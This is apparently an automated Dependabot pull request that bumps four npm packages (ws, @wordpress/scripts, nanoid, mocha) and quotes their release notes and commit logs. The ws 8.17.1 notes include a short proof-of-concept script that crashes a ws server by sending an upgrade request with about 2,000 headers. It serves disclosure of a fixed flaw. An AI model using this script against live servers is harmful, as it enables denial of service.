Bump the npm_and_yarn group across 1 directory with 4 updates

[dependabot]

Bumps the npm_and_yarn group with 4 updates in the / directory: ws, @wordpress/scripts, nanoid and mocha.

Updates ws from 7.5.10 to 8.18.0

Release notes

Sourced from ws's releases.

8.18.0

Features

• Added support for Blob (#2229).

8.17.1

Bug fixes

• Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding the[server.maxHeadersCount][] threshold could be used to crash a ws server.

const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j &lt; chars.length; j++) {
  const key = chars[i] + chars[j];
  headers[key] = 'x';
if (++count === 2000) break;
}

}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});

The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.

... (truncated)

Commits

• 976c53c [dist] 8.18.0
• 59b9629 [feature] Add support for Blob (#2229)
• 0d1b5e6 [security] Use more descriptive text for 2017 vulnerability link
• 15f11a0 [security] Add new DoS vulnerability to SECURITY.md
• 3c56601 [dist] 8.17.1
• e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
• 6a00029 [test] Increase code coverage
• ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
• b73b118 [dist] 8.17.0
• 29694a5 [test] Use the highWaterMark variable
• Additional commits viewable in compare view

Updates @wordpress/scripts from 27.9.0 to 30.6.0

Changelog

Sourced from @​wordpress/scripts's changelog.

30.6.0 (2024-11-27)

30.5.1 (2024-11-18)

Bug Fix

• Revert changes from #61121 that inlined CSS files imported from other CSS files before optimization in the build command.

30.5.0 (2024-11-16)

Bug Fix

• Make start script more resilient for developer errors (#66752).

30.4.0 (2024-10-30)

Enhancements

• Add BlueOak-1.0.0 the GPLv2-compatible licenses recognized by check-licenses (#66139).
• Add an optional --root-folder argument to the plugin-zip command (#61375). By default, the command will use the plugin's name as the root folder of the zip. If the change in the behavior impacted your workflow, you could pass --no-root-folder to remove the root folder.

Internal

• Refactor to extract license related logic to a reusable module (#66179).

30.3.0 (2024-10-17)

New Features

• Add new build-blocks-manifest command to generate a PHP file containing block metadata from all block.json files in a project (#65866).

30.2.0 (2024-10-16)

30.1.0 (2024-10-03)

30.0.0 (2024-09-19)

Breaking Changes

• Updated stylelint dependency to ^16.8.2 (#64828).
• Switched default config from @wordpress/stylelint-config/scss to use @wordpress/stylelint-config/scss-stylistic to keep stylistic rules (#64828).

29.0.0 (2024-09-05)

Breaking Changes

• Fixed the issue with having 5 high severity vulnerabilities by upgrading the puppeteer-core package to the latest major version ^23.1.0 (#64597).

Enhancements

... (truncated)

Commits

• cce81c1 chore(release): publish
• 6db1992 Update changelog files
• b24995a chore(release): publish
• b25f82f Update changelog files
• fdbe988 WP Scripts: Revert changes that inline CSS imports early in the build process...
• 510540d chore(release): publish
• 854d8c7 Update changelog files
• eac92a2 Merge changes published in the Gutenberg plugin "release/19.7" branch
• dcf4613 chore(release): publish
• 29094ac Update changelog files
• Additional commits viewable in compare view

Updates nanoid from 3.3.7 to 3.3.8

Changelog

Sourced from nanoid's changelog.

3.3.8

• Fixed a way to break Nano ID by passing non-integer size (by @​myndzi).

Commits

• 3044cd5 Release 3.3.8 version
• 4fe3495 Update size limit
• d643045 Fix pool pollution, infinite loop (#510)
• See full diff in compare view

Updates mocha from 10.2.0 to 11.0.1

Release notes

Sourced from mocha's releases.

v11.0.1

11.0.1 (2024-12-02)

🌟 Features

• bumped glob dependency from 8 to 10 (#5250) (43c3157)

📚 Documentation

• fix examples for linkPartialObjects methods (#5255) (34e0e52)

v11.0.0 Prerelease

11.0.0 (2024-11-11)

⚠ BREAKING CHANGES

• adapt new engine range for Mocha 11 (#5216)

🌟 Features

• allow calling hook methods (#5231) (e3da641)

🩹 Fixes

• adapt new engine range for Mocha 11 (#5216) (80da25a)

📚 Documentation

• downgrade example/tests chai to 4.5.0 (#5245) (eac87e1)

v10.8.2

10.8.2 (2024-10-30)

🩹 Fixes

• support errors with circular dependencies in object values with --parallel (#5212) (ba0fefe)
• test link in html reporter (#5224) (f054acc)

📚 Documentation

• indicate 'exports' interface does not work in browsers (#5181) (14e640e)

... (truncated)

Changelog

Sourced from mocha's changelog.

11.0.1 (2024-12-02)

🌟 Features

• bumped glob dependency from 8 to 10 (#5250) (43c3157)

📚 Documentation

• fix examples for linkPartialObjects methods (#5255) (34e0e52)

11.0.0 (2024-11-11)

⚠ BREAKING CHANGES

• adapt new engine range for Mocha 11 (#5216)

🌟 Features

• allow calling hook methods (#5231) (e3da641)

🩹 Fixes

• adapt new engine range for Mocha 11 (#5216) (80da25a)

📚 Documentation

• downgrade example/tests chai to 4.5.0 (#5245) (eac87e1)

10.8.2 (2024-10-30)

🩹 Fixes

• support errors with circular dependencies in object values with --parallel (#5212) (ba0fefe)
• test link in html reporter (#5224) (f054acc)

📚 Documentation

• indicate 'exports' interface does not work in browsers (#5181) (14e640e)

🧹 Chores

• fix docs builds by re-adding eleventy and ignoring gitignore again (#5240) (881e3b0)

🤖 Automation

• deps: bump the github-actions group with 1 update (#5132) (e536ab2)

10.8.1 (2024-10-29)

... (truncated)

Commits

• 4c558fb chore(main): release 11.0.1 (#5257)
• a5bd707 Release v11.0.1
• 43c3157 feat: bumped glob dependency from 8 to 10 (#5250)
• 34e0e52 docs: fix examples for linkPartialObjects methods (#5255)
• d3b2c38 chore(main): release 11.0.0 prerelease (#5241)
• 80da25a fix!: adapt new engine range for Mocha 11 (#5216)
• eac87e1 docs: downgrade example/tests chai to 4.5.0 (#5245)
• e3da641 feat: allow calling hook methods (#5231)
• 05097db chore(main): release 10.8.2 (#5239)
• 14e640e docs: indicate 'exports' interface does not work in browsers (#5181)
• Additional commits viewable in compare view

Maintainer changes

This version was pushed to npm by voxpelli, a new releaser for mocha since your current version.

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

---

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

• @dependabot rebase will rebase this PR
• @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
• @dependabot merge will merge this PR after your CI passes on it
• @dependabot squash and merge will squash and merge this PR after your CI passes on it
• @dependabot cancel merge will cancel a previously requested merge and block automerging
• @dependabot reopen will reopen this PR if it is closed
• @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
• @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
• @dependabot ignore <dependency name> major version will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)
• @dependabot ignore <dependency name> minor version will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)
• @dependabot ignore <dependency name> will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)
• @dependabot unignore <dependency name> will remove all of the ignore conditions of the specified dependency
• @dependabot unignore <dependency name> <ignore condition> will remove the ignore condition of the specified dependency and ignore conditions
  You can disable automated security fix PRs for this repo from the Security Alerts page.